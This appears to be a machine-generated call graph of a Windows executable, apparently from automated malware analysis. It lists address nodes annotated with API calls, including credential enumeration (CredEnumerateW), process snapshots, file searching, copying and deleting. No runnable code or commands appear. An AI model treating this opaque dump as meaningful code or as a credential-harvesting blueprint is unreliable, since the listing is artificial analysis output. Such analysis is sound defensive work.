40416->40420 40418 41ee6b 86 API calls 40417->40418 40417->40419 40418->40419 40419->40360 40420->40417 40421 41f28e memcmp 40420->40421 40423 41c8df 56 API calls 40420->40423 40421->40417 40422 41f2a9 40421->40422 40422->40417 40425 41f308 40422->40425 40426 41f2d8 40422->40426 40424 41f269 40423->40424 40424->40417 40427 41f287 40424->40427 40428 41f27a 40424->40428 40425->40417 40432 4446ce 11 API calls 40425->40432 40429 41ee6b 86 API calls 40426->40429 40427->40421 40430 41ee6b 86 API calls 40428->40430 40431 41f2e0 40429->40431 40430->40419 40433 41b1ca memset 40431->40433 40432->40417 40433->40419 40434->40360 40435->40360 40436->40360 40437->40354 40438->40355 40439->40369 40440->40372 40441->40372 40442->40372 40443->40372 40444->40372 40445->40390 40446->40373 40447->40386 40448->40398 37815 41276d 37816 41277d 37815->37816 37858 4044a4 LoadLibraryW 37816->37858 37818 412785 37819 412789 37818->37819 37866 414b81 37818->37866 37822 4127c8 37872 412465 memset ??2@YAPAXI 37822->37872 37824 4127ea 37884 40ac21 37824->37884 37829 412813 37902 40dd07 memset 37829->37902 37830 412827 37907 40db69 memset 37830->37907 37833 412822 37928 4125b6 ??3@YAXPAX 37833->37928 37835 40ada2 _wcsicmp 37837 41283d 37835->37837 37837->37833 37840 412863 CoInitialize 37837->37840 37912 41268e 37837->37912 37932 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37840->37932 37843 41296f 37934 40b633 37843->37934 37845 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37850 412957 CoUninitialize 37845->37850 37855 4128ca 37845->37855 37850->37833 37851 4128d0 TranslateAcceleratorW 37852 412941 GetMessageW 37851->37852 37851->37855 37852->37850 37852->37851 37853 412909 IsDialogMessageW 37853->37852 37853->37855 37854 4128fd IsDialogMessageW 37854->37852 37854->37853 37855->37851 37855->37853 37855->37854 37856 41292b TranslateMessage DispatchMessageW 37855->37856 37857 41291f IsDialogMessageW 37855->37857 37856->37852 37857->37852 37857->37856 37859 4044f7 37858->37859 37860 4044cf GetProcAddress 37858->37860 37864 404507 MessageBoxW 37859->37864 37865 40451e 37859->37865 37861 4044e8 FreeLibrary 37860->37861 37862 4044df 37860->37862 37861->37859 37863 4044f3 37861->37863 37862->37861 37863->37859 37864->37818 37865->37818 37867 414b8a 37866->37867 37868 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37866->37868 37938 40a804 memset 37867->37938 37868->37822 37871 414b9e GetProcAddress 37871->37868 37873 4124e0 37872->37873 37874 412505 ??2@YAPAXI 37873->37874 37875 41251c 37874->37875 37880 412521 37874->37880 37960 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37875->37960 37949 444722 37880->37949 37883 41259b wcscpy 37883->37824 37965 40b1ab free free 37884->37965 37886 40ad76 37966 40aa04 37886->37966 37889 40a9ce malloc memcpy free free 37892 40ac5c 37889->37892 37890 40ad4b 37890->37886 37989 40a9ce 37890->37989 37892->37886 37892->37889 37892->37890 37893 40ace7 free 37892->37893 37969 40a8d0 37892->37969 37981 4099f4 37892->37981 37893->37892 37897 40a8d0 7 API calls 37897->37886 37898 40ada2 37899 40adc9 37898->37899 37900 40adaa 37898->37900 37899->37829 37899->37830 37900->37899 37901 40adb3 _wcsicmp 37900->37901 37901->37899 37901->37900 37994 40dce0 37902->37994 37904 40dd3a GetModuleHandleW 37999 40dba7 37904->37999 37908 40dce0 3 API calls 37907->37908 37909 40db99 37908->37909 38071 40dae1 37909->38071 38085 402f3a 37912->38085 37914 412766 37914->37833 37914->37840 37915 4126d3 _wcsicmp 37916 4126a8 37915->37916 37916->37914 37916->37915 37918 41270a 37916->37918 38119 4125f8 7 API calls 37916->38119 37918->37914 38088 411ac5 37918->38088 37929 4125da 37928->37929 37930 4125f0 37929->37930 37931 4125e6 DeleteObject 37929->37931 37933 40b1ab free free 37930->37933 37931->37930 37932->37845 37933->37843 37935 40b640 37934->37935 37936 40b639 free 37934->37936 37937 40b1ab free free 37935->37937 37936->37935 37937->37819 37939 40a83b GetSystemDirectoryW 37938->37939 37940 40a84c wcscpy 37938->37940 37939->37940 37945 409719 wcslen 37940->37945 37943 40a881 LoadLibraryW 37944 40a886 37943->37944 37944->37868 37944->37871 37946 409724 37945->37946 37947 409739 wcscat LoadLibraryW 37945->37947 37946->37947 37948 40972c wcscat 37946->37948 37947->37943 37947->37944 37948->37947 37950 444732 37949->37950 37951 444728 DeleteObject 37949->37951 37961 409cc3 37950->37961 37951->37950 37953 412551 37954 4010f9 37953->37954 37955 401130 37954->37955 37956 401134 GetModuleHandleW LoadIconW 37955->37956 37957 401107 wcsncat 37955->37957 37958 40a7be 37956->37958 37957->37955 37959 40a7d2 37958->37959 37959->37883 37959->37959 37960->37880 37964 409bfd memset wcscpy 37961->37964 37963 409cdb CreateFontIndirectW 37963->37953 37964->37963 37965->37892 37967 40aa14 37966->37967 37968 40aa0a free 37966->37968 37967->37898 37968->37967 37970 40a8eb 37969->37970 37971 40a8df wcslen 37969->37971 37972 40a906 free 37970->37972 37973 40a90f 37970->37973 37971->37970 37974 40a919 37972->37974 37975 4099f4 3 API calls 37973->37975 37976 40a932 37974->37976 37977 40a929 free 37974->37977 37975->37974 37979 4099f4 3 API calls 37976->37979 37978 40a93e memcpy 37977->37978 37978->37892 37980 40a93d 37979->37980 37980->37978 37982 409a41 37981->37982 37983 4099fb malloc 37981->37983 37982->37892 37985 409a37 37983->37985 37986 409a1c 37983->37986 37985->37892 37987 409a30 free 37986->37987 37988 409a20 memcpy 37986->37988 37987->37985 37988->37987 37990 40a9e7 37989->37990 37991 40a9dc free 37989->37991 37992 4099f4 3 API calls 37990->37992 37993 40a9f2 37991->37993 37992->37993 37993->37897 38018 409bca GetModuleFileNameW 37994->38018 37996 40dce6 wcsrchr 37997 40dcf5 37996->37997 37998 40dcf9 wcscat 37996->37998 37997->37998 37998->37904 38019 44db70 37999->38019 38003 40dbfd 38022 4447d9 38003->38022 38006 40dc34 wcscpy wcscpy 38048 40d6f5 38006->38048 38007 40dc1f wcscpy 38007->38006 38010 40d6f5 3 API calls 38011 40dc73 38010->38011 38012 40d6f5 3 API calls 38011->38012 38013 40dc89 38012->38013 38014 40d6f5 3 API calls 38013->38014 38015 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38014->38015 38054 40da80 38015->38054 38018->37996 38020 40dbb4 memset memset 38019->38020 38021 409bca GetModuleFileNameW 38020->38021 38021->38003 38023 4447f4 38022->38023 38024 40dc1b 38023->38024 38025 444807 ??2@YAPAXI 38023->38025 38024->38006 38024->38007 38026 44481f 38025->38026 38027 444873 _snwprintf 38026->38027 38028 4448ab wcscpy 38026->38028 38061 44474a 8 API calls 38027->38061 38030 4448bb 38028->38030 38062 44474a 8 API calls 38030->38062 38031 4448a7 38031->38028 38031->38030 38033 4448cd 38063 44474a 8 API calls 38033->38063 38035 4448e2 38064 44474a 8 API calls 38035->38064 38037 4448f7 38065 44474a 8 API calls 38037->38065 38039 44490c 38066 44474a 8 API calls 38039->38066 38041 444921 38067 44474a 8 API calls 38041->38067 38043 444936 38068 44474a 8 API calls 38043->38068 38045 44494b 38069 44474a 8 API calls 38045->38069 38047 444960 ??3@YAXPAX 38047->38024 38049 44db70 38048->38049 38050 40d702 memset GetPrivateProfileStringW 38049->38050 38051 40d752 38050->38051 38052 40d75c WritePrivateProfileStringW 38050->38052 38051->38052 38053 40d758 38051->38053 38052->38053 38053->38010 38055 44db70 38054->38055 38056 40da8d memset 38055->38056 38057 40daac LoadStringW 38056->38057 38060 40dac6 38057->38060 38059 40dade 38059->37833 38060->38057 38060->38059 38070 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38060->38070 38061->38031 38062->38033 38063->38035 38064->38037 38065->38039 38066->38041 38067->38043 38068->38045 38069->38047 38070->38060 38081 409b98 GetFileAttributesW 38071->38081 38073 40daea 38074 40daef wcscpy wcscpy GetPrivateProfileIntW 38073->38074 38080 40db63 38073->38080 38082 40d65d GetPrivateProfileStringW 38074->38082 38076 40db3e 38083 40d65d GetPrivateProfileStringW 38076->38083 38078 40db4f 38084 40d65d GetPrivateProfileStringW 38078->38084 38080->37835 38081->38073 38082->38076 38083->38078 38084->38080 38120 40eaff 38085->38120 38089 411ae2 memset 38088->38089 38090 411b8f 38088->38090 38160 409bca GetModuleFileNameW 38089->38160 38102 411a8b 38090->38102 38092 411b0a wcsrchr 38093 411b22 wcscat 38092->38093 38094 411b1f 38092->38094 38161 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38093->38161 38094->38093 38096 411b67 38162 402afb 38096->38162 38100 411b7f 38218 40ea13 SendMessageW memset SendMessageW 38100->38218 38103 402afb 27 API calls 38102->38103 38104 411ac0 38103->38104 38105 4110dc 38104->38105 38106 41113e 38105->38106 38111 4110f0 38105->38111 38243 40969c LoadCursorW SetCursor 38106->38243 38108 411143 38244 4032b4 38108->38244 38262 444a54 38108->38262 38109 4110f7 _wcsicmp 38109->38111 38110 411157 38112 40ada2 _wcsicmp 38110->38112 38111->38106 38111->38109 38265 410c46 10 API calls 38111->38265 38115 411167 38112->38115 38113 4111af 38115->38113 38116 4111a6 qsort 38115->38116 38116->38113 38119->37916 38121 40eb10 38120->38121 38133 40e8e0 38121->38133 38124 40eb6c memcpy memcpy 38125 40ebb7 38124->38125 38125->38124 38126 40ebf2 ??2@YAPAXI ??2@YAPAXI 38125->38126 38128 40d134 16 API calls 38125->38128 38127 40ec65 38126->38127 38129 40ec2e ??2@YAPAXI 38126->38129 38143 40ea7f 38127->38143 38128->38125 38129->38127 38132 402f49 38132->37916 38134 40e8f2 38133->38134 38135 40e8eb ??3@YAXPAX 38133->38135 38136 40e900 38134->38136 38137 40e8f9 ??3@YAXPAX 38134->38137 38135->38134 38138 40e911 38136->38138 38139 40e90a ??3@YAXPAX 38136->38139 38137->38136 38140 40e931 ??2@YAPAXI ??2@YAPAXI 38138->38140 38141 40e921 ??3@YAXPAX 38138->38141 38142 40e92a ??3@YAXPAX 38138->38142 38139->38138 38140->38124 38141->38142 38142->38140 38144 40aa04 free 38143->38144 38145 40ea88 38144->38145 38146 40aa04 free 38145->38146 38147 40ea90 38146->38147 38148 40aa04 free 38147->38148 38149 40ea98 38148->38149 38150 40aa04 free 38149->38150 38151 40eaa0 38150->38151 38152 40a9ce 4 API calls 38151->38152 38153 40eab3 38152->38153 38154 40a9ce 4 API calls 38153->38154 38155 40eabd 38154->38155 38156 40a9ce 4 API calls 38155->38156 38157 40eac7 38156->38157 38158 40a9ce 4 API calls 38157->38158 38159 40ead1 38158->38159 38159->38132 38160->38092 38161->38096 38219 40b2cc 38162->38219 38164 402b0a 38165 40b2cc 27 API calls 38164->38165 38166 402b23 38165->38166 38167 40b2cc 27 API calls 38166->38167 38168 402b3a 38167->38168 38169 40b2cc 27 API calls 38168->38169 38170 402b54 38169->38170 38171 40b2cc 27 API calls 38170->38171 38172 402b6b 38171->38172 38173 40b2cc 27 API calls 38172->38173 38174 402b82 38173->38174 38175 40b2cc 27 API calls 38174->38175 38176 402b99 38175->38176 38177 40b2cc 27 API calls 38176->38177 38178 402bb0 38177->38178 38179 40b2cc 27 API calls 38178->38179 38180 402bc7 38179->38180 38181 40b2cc 27 API calls 38180->38181 38182 402bde 38181->38182 38183 40b2cc 27 API calls 38182->38183 38184 402bf5 38183->38184 38185 40b2cc 27 API calls 38184->38185 38186 402c0c 38185->38186 38187 40b2cc 27 API calls 38186->38187 38188 402c23 38187->38188 38189 40b2cc 27 API calls 38188->38189 38190 402c3a 38189->38190 38191 40b2cc 27 API calls 38190->38191 38192 402c51 38191->38192 38193 40b2cc 27 API calls 38192->38193 38194 402c68 38193->38194 38195 40b2cc 27 API calls 38194->38195 38196 402c7f 38195->38196 38197 40b2cc 27 API calls 38196->38197 38198 402c99 38197->38198 38199 40b2cc 27 API calls 38198->38199 38200 402cb3 38199->38200 38201 40b2cc 27 API calls 38200->38201 38202 402cd5 38201->38202 38203 40b2cc 27 API calls 38202->38203 38204 402cf0 38203->38204 38205 40b2cc 27 API calls 38204->38205 38206 402d0b 38205->38206 38207 40b2cc 27 API calls 38206->38207 38208 402d26 38207->38208 38209 40b2cc 27 API calls 38208->38209 38210 402d3e 38209->38210 38211 40b2cc 27 API calls 38210->38211 38212 402d59 38211->38212 38213 40b2cc 27 API calls 38212->38213 38214 402d78 38213->38214 38215 40b2cc 27 API calls 38214->38215 38216 402d93 38215->38216 38217 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38216->38217 38217->38100 38218->38090 38222 40b58d 38219->38222 38221 40b2d1 38221->38164 38223 40b5a4 GetModuleHandleW FindResourceW 38222->38223 38224 40b62e 38222->38224 38225 40b5c2 LoadResource 38223->38225 38227 40b5e7 38223->38227 38224->38221 38226 40b5d0 SizeofResource LockResource 38225->38226 38225->38227 38226->38227 38227->38224 38235 40afcf 38227->38235 38229 40b608 memcpy 38238 40b4d3 memcpy 38229->38238 38231 40b61e 38239 40b3c1 18 API calls 38231->38239 38233 40b626 38240 40b04b 38233->38240 38236 40b04b ??3@YAXPAX 38235->38236 38237 40afd7 ??2@YAPAXI 38236->38237 38237->38229 38238->38231 38239->38233 38241 40b051 ??3@YAXPAX 38240->38241 38242 40b05f 38240->38242 38241->38242 38242->38224 38243->38108 38245 4032c4 38244->38245 38246 40b633 free 38245->38246 38247 403316 38246->38247 38266 44553b 38247->38266 38251 403480 38464 40368c 15 API calls 38251->38464 38253 403489 38254 40b633 free 38253->38254 38256 403495 38254->38256 38255 40333c 38255->38251 38257 4033a9 memset memcpy 38255->38257 38258 4033ec wcscmp 38255->38258 38462 4028e7 11 API calls 38255->38462 38463 40f508 6 API calls 38255->38463 38256->38110 38257->38255 38257->38258 38258->38255 38261 403421 _wcsicmp 38261->38255 38263 444a64 FreeLibrary 38262->38263 38264 444a83 38262->38264 38263->38264 38264->38110 38265->38111 38267 445548 38266->38267 38268 445599 38267->38268 38465 40c768 38267->38465 38269 4455a8 memset 38268->38269 38276 4457f2 38268->38276 38548 403988 38269->38548 38279 445854 38276->38279 38650 403e2d memset memset memset memset memset 38276->38650 38277 4455e5 38288 445672 38277->38288 38293 44560f 38277->38293 38278 4458bb memset memset 38281 414c2e 17 API calls 38278->38281 38332 4458aa 38279->38332 38673 403c9c memset memset memset memset memset 38279->38673 38284 4458f9 38281->38284 38283 44595e memset memset 38291 414c2e 17 API calls 38283->38291 38292 40b2cc 27 API calls 38284->38292 38286 44558c 38532 444b06 38286->38532 38287 44557a 38287->38286 38746 4136c0 CoTaskMemFree 38287->38746 38559 403fbe memset memset memset memset memset 38288->38559 38289 445a00 memset memset 38696 414c2e 38289->38696 38290 445b22 38296 445bca 38290->38296 38297 445b38 memset memset memset 38290->38297 38301 44599c 38291->38301 38303 445909 38292->38303 38305 4087b3 338 API calls 38293->38305 38295 445849 38762 40b1ab free free 38295->38762 38304 445c8b memset memset 38296->38304 38370 445cf0 38296->38370 38308 445bd4 38297->38308 38309 445b98 38297->38309 38302 40b2cc 27 API calls 38301->38302 38316 4459ac 38302->38316 38313 409d1f 6 API calls 38303->38313 38317 414c2e 17 API calls 38304->38317 38314 445621 38305->38314 38306 44589f 38763 40b1ab free free 38306->38763 38307 445585 38747 41366b FreeLibrary 38307->38747 38323 414c2e 17 API calls 38308->38323 38309->38308 38319 445ba2 38309->38319 38312 403335 38461 4452e5 45 API calls 38312->38461 38327 445919 38313->38327 38748 4454bf 20 API calls 38314->38748 38315 445823 38315->38295 38337 4087b3 338 API calls 38315->38337 38328 409d1f 6 API calls 38316->38328 38329 445cc9 38317->38329 38835 4099c6 wcslen 38319->38835 38320 4456b2 38750 40b1ab free free 38320->38750 38322 40b2cc 27 API calls 38333 445a4f 38322->38333 38324 445be2 38323->38324 38335 40b2cc 27 API calls 38324->38335 38325 445d3d 38355 40b2cc 27 API calls 38325->38355 38326 445d88 memset memset memset 38338 414c2e 17 API calls 38326->38338 38764 409b98 GetFileAttributesW 38327->38764 38339 4459bc 38328->38339 38340 409d1f 6 API calls 38329->38340 38330 445879 38330->38306 38351 4087b3 338 API calls 38330->38351 38332->38278 38356 44594a 38332->38356 38712 409d1f wcslen wcslen 38333->38712 38345 445bf3 38335->38345 38337->38315 38348 445dde 38338->38348 38831 409b98 GetFileAttributesW 38339->38831 38350 445ce1 38340->38350 38341 445bb3 38838 445403 memset 38341->38838 38342 445680 38342->38320 38582 4087b3 memset 38342->38582 38354 409d1f 6 API calls 38345->38354 38346 445928 38346->38356 38765 40b6ef 38346->38765 38357 40b2cc 27 API calls 38348->38357 38855 409b98 GetFileAttributesW 38350->38855 38351->38330 38353 40b2cc 27 API calls 38362 445a94 38353->38362 38364 445c07 38354->38364 38365 445d54 _wcsicmp 38355->38365 38356->38283 38369 4459ed 38356->38369 38368 445def 38357->38368 38358 4459cb 38358->38369 38378 40b6ef 253 API calls 38358->38378 38717 40ae18 38362->38717 38363 44566d 38363->38276 38633 413d4c 38363->38633 38374 445389 259 API calls 38364->38374 38375 445d71 38365->38375 38438 445d67 38365->38438 38367 445665 38749 40b1ab free free 38367->38749 38376 409d1f 6 API calls 38368->38376 38369->38289 38369->38290 38370->38312 38370->38325 38370->38326 38371 445389 259 API calls 38371->38296 38380 445c17 38374->38380 38856 445093 23 API calls 38375->38856 38383 445e03 38376->38383 38378->38369 38379 4456d8 38385 40b2cc 27 API calls 38379->38385 38386 40b2cc 27 API calls 38380->38386 38382 44563c 38382->38367 38388 4087b3 338 API calls 38382->38388 38857 409b98 GetFileAttributesW 38383->38857 38384 40b6ef 253 API calls 38384->38312 38390 4456e2 38385->38390 38391 445c23 38386->38391 38387 445d83 38387->38312 38388->38382 38751 413fa6 _wcsicmp _wcsicmp 38390->38751 38395 409d1f 6 API calls 38391->38395 38393 445e12 38400 445e6b 38393->38400 38407 40b2cc 27 API calls 38393->38407 38398 445c37 38395->38398 38396 445aa1 38399 445b17 38396->38399 38414 445ab2 memset 38396->38414 38427 409d1f 6 API calls 38396->38427 38724 40add4 38396->38724 38729 445389 38396->38729 38738 40ae51 38396->38738 38397 4456eb 38403 4456fd memset memset memset memset 38397->38403 38404 4457ea 38397->38404 38405 445389 259 API calls 38398->38405 38832 40aebe 38399->38832 38859 445093 23 API calls 38400->38859 38752 409c70 wcscpy wcsrchr 38403->38752 38755 413d29 38404->38755 38410 445c47 38405->38410 38411 445e33 38407->38411 38408 445e7e 38413 445f67 38408->38413 38416 40b2cc 27 API calls 38410->38416 38417 409d1f 6 API calls 38411->38417 38422 40b2cc 27 API calls 38413->38422 38418 40b2cc 27 API calls 38414->38418 38420 445c53 38416->38420 38421 445e47 38417->38421 38418->38396 38419 409c70 2 API calls 38423 44577e 38419->38423 38424 409d1f 6 API calls 38420->38424 38858 409b98 GetFileAttributesW 38421->38858 38426 445f73 38422->38426 38428 409c70 2 API calls 38423->38428 38429 445c67 38424->38429 38431 409d1f 6 API calls 38426->38431 38427->38396 38432 44578d 38428->38432 38433 445389 259 API calls 38429->38433 38430 445e56 38430->38400 38436 445e83 memset 38430->38436 38434 445f87 38431->38434 38432->38404 38440 40b2cc 27 API calls 38432->38440 38433->38296 38862 409b98 GetFileAttributesW 38434->38862 38439 40b2cc 27 API calls 38436->38439 38438->38312 38438->38384 38441 445eab 38439->38441 38442 4457a8 38440->38442 38443 409d1f 6 API calls 38441->38443 38444 409d1f 6 API calls 38442->38444 38445 445ebf 38443->38445 38446 4457b8 38444->38446 38447 40ae18 9 API calls 38445->38447 38754 409b98 GetFileAttributesW 38446->38754 38457 445ef5 38447->38457 38449 4457c7 38449->38404 38451 4087b3 338 API calls 38449->38451 38450 40ae51 9 API calls 38450->38457 38451->38404 38452 445f5c 38454 40aebe FindClose 38452->38454 38453 40add4 2 API calls 38453->38457 38454->38413 38455 40b2cc 27 API calls 38455->38457 38456 409d1f 6 API calls 38456->38457 38457->38450 38457->38452 38457->38453 38457->38455 38457->38456 38459 445f3a 38457->38459 38860 409b98 GetFileAttributesW 38457->38860 38861 445093 23 API calls 38459->38861 38461->38255 38462->38261 38463->38255 38464->38253 38466 40c775 38465->38466 38863 40b1ab free free 38466->38863 38468 40c788 38864 40b1ab free free 38468->38864 38470 40c790 38865 40b1ab free free 38470->38865 38472 40c798 38473 40aa04 free 38472->38473 38474 40c7a0 38473->38474 38866 40c274 memset 38474->38866 38479 40a8ab 9 API calls 38480 40c7c3 38479->38480 38481 40a8ab 9 API calls 38480->38481 38482 40c7d0 38481->38482 38895 40c3c3 38482->38895 38486 40c877 38495 40bdb0 38486->38495 38487 40c86c 38937 4053fe 39 API calls 38487->38937 38493 40c7e5 38493->38486 38493->38487 38494 40c634 50 API calls 38493->38494 38920 40a706 38493->38920 38494->38493 39200 404363 38495->39200 38498 40bf5d 39220 40440c 38498->39220 38499 40bdee 38499->38498 38503 40b2cc 27 API calls 38499->38503 38500 40bddf CredEnumerateW 38500->38499 38504 40be02 wcslen 38503->38504 38504->38498 38511 40be1e 38504->38511 38505 40be26 wcsncmp 38505->38511 38508 40be7d memset 38509 40bea7 memcpy 38508->38509 38508->38511 38510 40bf11 wcschr 38509->38510 38509->38511 38510->38511 38511->38498 38511->38505 38511->38508 38511->38509 38511->38510 38512 40b2cc 27 API calls 38511->38512 38514 40bf43 LocalFree 38511->38514 39223 40bd5d 28 API calls 38511->39223 39224 404423 38511->39224 38513 40bef6 _wcsnicmp 38512->38513 38513->38510 38513->38511 38514->38511 38515 4135f7 39239 4135e0 38515->39239 38518 40b2cc 27 API calls 38519 41360d 38518->38519 38520 40a804 8 API calls 38519->38520 38521 413613 38520->38521 38522 41361b 38521->38522 38523 41363e 38521->38523 38524 40b273 27 API calls 38522->38524 38525 4135e0 FreeLibrary 38523->38525 38526 413625 GetProcAddress 38524->38526 38527 413643 38525->38527 38526->38523 38528 413648 38526->38528 38527->38287 38529 413658 38528->38529 38530 4135e0 FreeLibrary 38528->38530 38529->38287 38531 413666 38530->38531 38531->38287 39242 4449b9 38532->39242 38535 444c1f 38535->38268 38536 4449b9 42 API calls 38538 444b4b 38536->38538 38537 444c15 38540 4449b9 42 API calls 38537->38540 38538->38537 39263 444972 GetVersionExW 38538->39263 38540->38535 38541 444b99 memcmp 38546 444b8c 38541->38546 38542 444c0b 39267 444a85 42 API calls 38542->39267 38546->38541 38546->38542 39264 444aa5 42 API calls 38546->39264 39265 40a7a0 GetVersionExW 38546->39265 39266 444a85 42 API calls 38546->39266 38549 40399d 38548->38549 39268 403a16 38549->39268 38551 403a09 39282 40b1ab free free 38551->39282 38553 403a12 wcsrchr 38553->38277 38554 4039a3 38554->38551 38557 4039f4 38554->38557 39279 40a02c CreateFileW 38554->39279 38557->38551 38558 4099c6 2 API calls 38557->38558 38558->38551 38560 414c2e 17 API calls 38559->38560 38561 404048 38560->38561 38562 414c2e 17 API calls 38561->38562 38563 404056 38562->38563 38564 409d1f 6 API calls 38563->38564 38565 404073 38564->38565 38566 409d1f 6 API calls 38565->38566 38567 40408e 38566->38567 38568 409d1f 6 API calls 38567->38568 38569 4040a6 38568->38569 38570 403af5 20 API calls 38569->38570 38571 4040ba 38570->38571 38572 403af5 20 API calls 38571->38572 38573 4040cb 38572->38573 39309 40414f memset 38573->39309 38575 404140 39323 40b1ab free free 38575->39323 38576 4040ec memset 38580 4040e0 38576->38580 38578 404148 38578->38342 38579 4099c6 2 API calls 38579->38580 38580->38575 38580->38576 38580->38579 38581 40a8ab 9 API calls 38580->38581 38581->38580 39336 40a6e6 WideCharToMultiByte 38582->39336 38584 4087ed 39337 4095d9 memset 38584->39337 38587 408809 memset memset memset memset memset 38588 40b2cc 27 API calls 38587->38588 38589 4088a1 38588->38589 38590 409d1f 6 API calls 38589->38590 38591 4088b1 38590->38591 38592 40b2cc 27 API calls 38591->38592 38593 4088c0 38592->38593 38594 409d1f 6 API calls 38593->38594 38595 4088d0 38594->38595 38596 40b2cc 27 API calls 38595->38596 38597 4088df 38596->38597 38598 409d1f 6 API calls 38597->38598 38599 4088ef 38598->38599 38600 40b2cc 27 API calls 38599->38600 38601 4088fe 38600->38601 38602 409d1f 6 API calls 38601->38602 38603 40890e 38602->38603 38604 40b2cc 27 API calls 38603->38604 38605 40891d 38604->38605 38606 409d1f 6 API calls 38605->38606 38607 40892d 38606->38607 39356 409b98 GetFileAttributesW 38607->39356 38609 40893e 38610 408943 38609->38610 38611 408958 38609->38611 38614 408953 38614->38342 38634 40b633 free 38633->38634 38635 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38634->38635 38636 413f00 Process32NextW 38635->38636 38637 413da5 OpenProcess 38636->38637 38638 413f17 CloseHandle 38636->38638 38639 413eb0 38637->38639 38640 413df3 memset 38637->38640 38638->38379 38639->38636 38642 413ebf free 38639->38642 38643 4099f4 3 API calls 38639->38643 39780 413f27 38640->39780 38642->38639 38643->38639 38644 413e1f 38645 413e37 GetModuleHandleW 38644->38645 39785 413959 38644->39785 39801 413ca4 38644->39801 38645->38644 38647 413e46 GetProcAddress 38645->38647 38647->38644 38649 413ea2 CloseHandle 38649->38639 38651 414c2e 17 API calls 38650->38651 38652 403eb7 38651->38652 38653 414c2e 17 API calls 38652->38653 38654 403ec5 38653->38654 38655 409d1f 6 API calls 38654->38655 38656 403ee2 38655->38656 38657 409d1f 6 API calls 38656->38657 38658 403efd 38657->38658 38659 409d1f 6 API calls 38658->38659 38660 403f15 38659->38660 38661 403af5 20 API calls 38660->38661 38662 403f29 38661->38662 38663 403af5 20 API calls 38662->38663 38664 403f3a 38663->38664 38665 40414f 33 API calls 38664->38665 38671 403f4f 38665->38671 38666 403faf 39815 40b1ab free free 38666->39815 38668 403f5b memset 38668->38671 38669 403fb7 38669->38315 38670 4099c6 2 API calls 38670->38671 38671->38666 38671->38668 38671->38670 38672 40a8ab 9 API calls 38671->38672 38672->38671 38674 414c2e 17 API calls 38673->38674 38675 403d26 38674->38675 38676 414c2e 17 API calls 38675->38676 38677 403d34 38676->38677 38678 409d1f 6 API calls 38677->38678 38679 403d51 38678->38679 38680 409d1f 6 API calls 38679->38680 38681 403d6c 38680->38681 38682 409d1f 6 API calls 38681->38682 38683 403d84 38682->38683 38684 403af5 20 API calls 38683->38684 38685 403d98 38684->38685 38686 403af5 20 API calls 38685->38686 38687 403da9 38686->38687 38688 40414f 33 API calls 38687->38688 38689 403dbe 38688->38689 38690 403e1e 38689->38690 38692 403dca memset 38689->38692 38694 4099c6 2 API calls 38689->38694 38695 40a8ab 9 API calls 38689->38695 39816 40b1ab free free 38690->39816 38692->38689 38693 403e26 38693->38330 38694->38689 38695->38689 38697 414b81 9 API calls 38696->38697 38699 414c40 38697->38699 38698 414c73 memset 38701 414c94 38698->38701 38699->38698 39817 409cea 38699->39817 39820 414592 RegOpenKeyExW 38701->39820 38704 414c64 SHGetSpecialFolderPathW 38706 414d0b 38704->38706 38705 414cc1 38707 414cf4 wcscpy 38705->38707 39821 414bb0 wcscpy 38705->39821 38706->38322 38707->38706 38709 414cd2 39822 4145ac RegQueryValueExW 38709->39822 38711 414ce9 RegCloseKey 38711->38707 38713 409d62 38712->38713 38714 409d43 wcscpy 38712->38714 38713->38353 38715 409719 2 API calls 38714->38715 38716 409d51 wcscat 38715->38716 38716->38713 38718 40aebe FindClose 38717->38718 38719 40ae21 38718->38719 38720 4099c6 2 API calls 38719->38720 38721 40ae35 38720->38721 38722 409d1f 6 API calls 38721->38722 38723 40ae49 38722->38723 38723->38396 38725 40ade0 38724->38725 38728 40ae0f 38724->38728 38726 40ade7 wcscmp 38725->38726 38725->38728 38727 40adfe wcscmp 38726->38727 38726->38728 38727->38728 38728->38396 38730 40ae18 9 API calls 38729->38730 38731 4453c4 38730->38731 38732 40ae51 9 API calls 38731->38732 38733 4453f3 38731->38733 38734 40add4 2 API calls 38731->38734 38737 445403 254 API calls 38731->38737 38732->38731 38735 40aebe FindClose 38733->38735 38734->38731 38736 4453fe 38735->38736 38736->38396 38737->38731 38739 40ae7b FindNextFileW 38738->38739 38740 40ae5c FindFirstFileW 38738->38740 38741 40ae94 38739->38741 38742 40ae8f 38739->38742 38740->38741 38744 40aeb6 38741->38744 38745 409d1f 6 API calls 38741->38745 38743 40aebe FindClose 38742->38743 38743->38741 38744->38396 38745->38744 38746->38307 38747->38286 38748->38382 38749->38363 38750->38363 38751->38397 38753 409c89 38752->38753 38753->38419 38754->38449 38756 413d39 38755->38756 38757 413d2f FreeLibrary 38755->38757 38758 40b633 free 38756->38758 38757->38756 38759 413d42 38758->38759 38760 40b633 free 38759->38760 38761 413d4a 38760->38761 38761->38276 38762->38279 38763->38332 38764->38346 38766 44db70 38765->38766 38767 40b6fc memset 38766->38767 38768 409c70 2 API calls 38767->38768 38769 40b732 wcsrchr 38768->38769 38770 40b743 38769->38770 38771 40b746 memset 38769->38771 38770->38771 38772 40b2cc 27 API calls 38771->38772 38773 40b76f 38772->38773 38774 409d1f 6 API calls 38773->38774 38775 40b783 38774->38775 39823 409b98 GetFileAttributesW 38775->39823 38777 40b792 38778 40b7c2 38777->38778 38779 409c70 2 API calls 38777->38779 39824 40bb98 38778->39824 38781 40b7a5 38779->38781 38783 40b2cc 27 API calls 38781->38783 38787 40b7b2 38783->38787 38784 40b837 CloseHandle 38786 40b83e memset 38784->38786 38785 40b817 38788 409a45 3 API calls 38785->38788 39857 40a6e6 WideCharToMultiByte 38786->39857 38790 409d1f 6 API calls 38787->38790 38791 40b827 CopyFileW 38788->38791 38790->38778 38791->38786 38792 40b866 38793 444432 121 API calls 38792->38793 38794 40b879 38793->38794 38795 40bad5 38794->38795 38796 40b273 27 API calls 38794->38796 38797 40baeb 38795->38797 38798 40bade DeleteFileW 